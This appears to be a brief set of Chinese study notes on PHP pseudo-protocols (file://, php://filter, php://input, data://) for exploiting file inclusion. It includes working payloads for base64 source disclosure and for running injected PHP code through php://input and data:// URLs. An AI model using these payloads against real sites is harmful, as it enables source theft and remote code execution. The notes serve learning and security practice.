php伪协议 --- file伪协议
用于访问本地系统 不受 php.ini里的影响
allow_url_fopen = off/on
allow_url_include: off /on
这两个开不开都行
file = file://E:\XXX\1.txt 绝对路径
读取1.txt文件,当作代码执行?
php://filter 伪协议
php://filter 读取源代码并进行base64编码输出
file=php://filter/read=convert.base64-encode/resource=./1.txt
读取1.txt内容,并base64加密后显示
php://input
php://input 可以访问请求的原始数据的只读流
allow_url_include = on 必须开启
?file=php://input
然后用post方式传参 当作php代码执行 <?php phpinfo(); ?>
写入一个文件
<?php fputs(fopen("1.txt","w"),'1234');?>
data:// 协议
allow_url fopen=on
allow url include=on
?file = data://text/plain,<?php phpinfo();?>
也可以用base64
?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= 不用带;分号结尾 ???
这两种都可以